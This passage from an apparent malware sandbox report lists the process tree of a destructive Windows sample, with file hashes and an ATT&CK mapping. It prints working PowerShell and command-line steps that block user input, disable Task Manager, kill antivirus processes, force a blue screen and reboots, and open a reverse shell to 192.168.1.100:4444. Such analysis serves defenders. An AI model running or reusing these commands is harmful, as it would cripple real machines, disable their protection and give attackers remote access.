        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3656
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ogflezkh\ogflezkh.cmdline"
        10⤵
        
        PID:3532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        9⤵
        
        PID:2348
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1y4xbaih\1y4xbaih.cmdline"
        10⤵
        
        PID:2988
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D1D.tmp" "c:\Users\Admin\AppData\Local\Temp\1y4xbaih\CSC1B3F7322E1B24E0B9A84902096F977CA.TMP"
        11⤵
        
        PID:5016
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        9⤵
        
        PID:5016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        9⤵
        
        PID:1204
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qk15cy1s\qk15cy1s.cmdline"
        10⤵
        
        PID:5336
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES923D.tmp" "c:\Users\Admin\AppData\Local\Temp\qk15cy1s\CSC4FF3BAF6F7A14933AE7772D679BF9D48.TMP"
        11⤵
        
        PID:5428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        9⤵
        
        PID:5788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        9⤵
        
        PID:7608
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        9⤵
        Kills process with taskkill
        
        PID:4832
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        9⤵
        Kills process with taskkill
        
        PID:5136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        9⤵
        Kills process with taskkill
        
        PID:404
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        9⤵
        Kills process with taskkill
        
        PID:5400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        9⤵
        Kills process with taskkill
        
        PID:8184
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        9⤵
        Kills process with taskkill
        
        PID:8180
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        9⤵
        Kills process with taskkill
        
        PID:5756
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        9⤵
        Kills process with taskkill
        
        PID:8376
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        9⤵
        Kills process with taskkill
        
        PID:8428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        9⤵
        Kills process with taskkill
        
        PID:8860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2348
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0ie045gd\0ie045gd.cmdline"
        8⤵
        
        PID:5020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        7⤵
        
        PID:3900
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oljvjv23\oljvjv23.cmdline"
        8⤵
        
        PID:5036
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES886A.tmp" "c:\Users\Admin\AppData\Local\Temp\oljvjv23\CSC2FC077989BBC45E5A852E6718FA03A5B.TMP"
        9⤵
        
        PID:2628
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        
        PID:4608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        7⤵
        
        PID:3856
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u0hkjj0s\u0hkjj0s.cmdline"
        8⤵
        
        PID:4400
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8B29.tmp" "c:\Users\Admin\AppData\Local\Temp\u0hkjj0s\CSCB283D4E1A054181ACB3CE94BDCAD0A7.TMP"
        9⤵
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        7⤵
        
        PID:4448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        7⤵
        
        PID:8048
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        7⤵
        Kills process with taskkill
        
        PID:4216
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        7⤵
        Kills process with taskkill
        
        PID:3132
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        7⤵
        Kills process with taskkill
        
        PID:6408
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        7⤵
        Kills process with taskkill
        
        PID:5136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        7⤵
        Kills process with taskkill
        
        PID:1956
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        7⤵
        Kills process with taskkill
        
        PID:5652
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        7⤵
        Kills process with taskkill
        
        PID:5668
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        7⤵
        Kills process with taskkill
        
        PID:6108
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        7⤵
        Kills process with taskkill
        
        PID:7196
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        7⤵
        Kills process with taskkill
        
        PID:5720
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        7⤵
        Kills process with taskkill
        
        PID:8324
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        7⤵
        Kills process with taskkill
        
        PID:8420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        7⤵
        
        PID:8764
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3400
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nv45ojmx\nv45ojmx.cmdline"
        6⤵
        
        PID:196
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4832
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uietflvb\uietflvb.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4492
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES731D.tmp" "c:\Users\Admin\AppData\Local\Temp\uietflvb\CSC2288FC84424F46DF99BD99E67222E7B2.TMP"
        7⤵
        
        PID:3880
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        
        PID:1636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4384
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iy1xicat\iy1xicat.cmdline"
        6⤵
        
        PID:756
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES77C0.tmp" "c:\Users\Admin\AppData\Local\Temp\iy1xicat\CSCF63E73452B3442C5BFBD935D9849274.TMP"
        7⤵
        
        PID:2308
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        5⤵
        
        PID:3372
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4016
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        5⤵
        
        PID:5028
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        5⤵
        Kills process with taskkill
        
        PID:5696
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        5⤵
        Kills process with taskkill
        
        PID:4088
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        5⤵
        Kills process with taskkill
        
        PID:6304
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        5⤵
        Kills process with taskkill
        
        PID:5156
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        5⤵
        Kills process with taskkill
        
        PID:7004
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        5⤵
        Kills process with taskkill
        
        PID:4824
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        5⤵
        Kills process with taskkill
        
        PID:5284
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        5⤵
        Kills process with taskkill
        
        PID:7052
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        5⤵
        Kills process with taskkill
        
        PID:5216
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        5⤵
        Kills process with taskkill
        
        PID:1400
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2392
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        5⤵
        Kills process with taskkill
        
        PID:6928
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        5⤵
        
        PID:2580
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\skhadvat\skhadvat.cmdline"
        6⤵
        
        PID:6460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aaqyijuf\aaqyijuf.cmdline"
      4⤵
      PID:5100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3532
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wtaex2ts\wtaex2ts.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4396
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71D4.tmp" "c:\Users\Admin\AppData\Local\Temp\wtaex2ts\CSCBEBF0AC98822423086C3D46CE2FA9F6D.TMP"
        5⤵
        
        PID:632
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:4136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3844
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\psmgwbzz\psmgwbzz.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2204
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp" "c:\Users\Admin\AppData\Local\Temp\psmgwbzz\CSC21395E7C3E1E42C8BDEB416519204317.TMP"
        5⤵
        
        PID:2584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
    3⤵
    PID:2176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
    3⤵
    PID:6032
- - C:\Windows\system32\taskkill.exe
    taskkill /IM MsMpEng.exe /F
    3⤵
    - Kills process with taskkill
    PID:5400
- - C:\Windows\system32\taskkill.exe
    taskkill /IM AvastSvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:6048
- - C:\Windows\system32\taskkill.exe
    taskkill /IM avgsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:5892
- - C:\Windows\system32\taskkill.exe
    taskkill /IM McAfee.exe /F
    3⤵
    - Kills process with taskkill
    PID:5500
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Norton.exe /F
    3⤵
    - Kills process with taskkill
    PID:6100
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Kaspersky.exe /F
    3⤵
    - Kills process with taskkill
    PID:2408
- - C:\Windows\system32\taskkill.exe
    taskkill /IM BitDefender.exe /F
    3⤵
    - Kills process with taskkill
    PID:344
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Sophos.exe /F
    3⤵
    - Kills process with taskkill
    PID:5396
- - C:\Windows\system32\taskkill.exe
    taskkill /IM malwarebytes.exe /F
    3⤵
    - Kills process with taskkill
    PID:5192
- - C:\Windows\system32\taskkill.exe
    taskkill /IM CylanceSvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:1760
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Panda.exe /F
    3⤵
    - Kills process with taskkill
    PID:4140
- - C:\Windows\system32\taskkill.exe
    taskkill /IM EsetService.exe /F
    3⤵
    - Kills process with taskkill
    PID:2280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
    3⤵
    PID:1400
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kdn0e1qj\kdn0e1qj.cmdline"
      4⤵
      PID:6460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class BSoD { [DllImport(\"ntdll.dll\", SetLastError=true)] public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ResponseOption, out uint Response); }'; [BSoD]::NtRaiseHardError(0xc0000005, 0, 0, [IntPtr]::Zero, 6, [ref]0)"
    3⤵
    PID:3548
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wto1iirv\wto1iirv.cmdline"
      4⤵
      PID:8092
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:5756
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:5640
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:8308
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:8340
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:8368
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:8680

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3af2055 /state1:0x41c64e6d
1⤵
PID:5164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ebb80c4390f979cf421c14153ece71b6

SHA1
3ec4cf97fcc9c82cd773442b007f0d7d20e2305a

SHA256
30e5eff4ed0cf965f112deeebba7b9d8b2b00c01a429ab0869adc6221e5a3263

SHA512
e944c20a6ef5b4feeb0864ca41cb1c04d3f99c7f305e23c5bbc70c993b9eb4cd315699ba6f71cb0bbfaf3521a25f6181c2cfacd7fa5cd00c946db3fb7a21875f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
20f5d1d4a158000513915f1ce522bdde

SHA1
fb4229cbad3d7afcf2c304410397dff55512c01d

SHA256
892dfa1e661998105e03c80d8e51918f4c7b76e7b62ab9bccde13f3445febb57

SHA512
1bb2abcb6caebbaef8864d3e46cfc96b0b58eae1629077ffa81ce50edbb79dc884cab7d67b4e4997f4a2e92ff6154f23ac0b7c8a7894666bbb1a718d7b800bce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
afc96098619ca12e522a0d493cd0ada1

SHA1
dc19d82741c0ed3f259007df76561cd56a1e6b38

SHA256
0b0f510552acbfc68b23832b5bef4cc71b08890acd3f017b3db82f49bc00fceb

SHA512
a809b7218161e236daa40de6748de3169bbffb95bcfe87caf90308a93abbfb677cd2e7726dafe22dce2def03efb5243cba56375e70fce2a21f7463e760e412e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
41cb12c4e1a09b2c98312d240bc995aa

SHA1
b12979e513f3a3dd5ad879d20bd1252ce237b7ed

SHA256
e67efbb6f01b7cd218d3826d677df61ab3467dbc67dceb1a7880bf15840e4d5f

SHA512
a112795e368140545f89dbebf9673ab143a306b69c5cab82bfb0d8ec613c0d5dbd79c3dc7a2ca75d61bffdbe64e231247f9e3c867baef9ccc5a595bb1bbf0ab6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
388f880ec3ea60ac0097f16d31af839d

SHA1
3b66aea9a3b449cf72e0b96074160ccd7d3fe0c2

SHA256
8e157b0505fa8e9daf1bbc62915b8886a1d474e6de0b7b9e409c4d42c93922de

SHA512
d07992aa9502b02426b4284282c6142857df239e18dffe0d5faaad1003421025fbe40b834aca0ab6fe1c3f45823498be34308d61e5325133ac5acb6b529a2ae0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
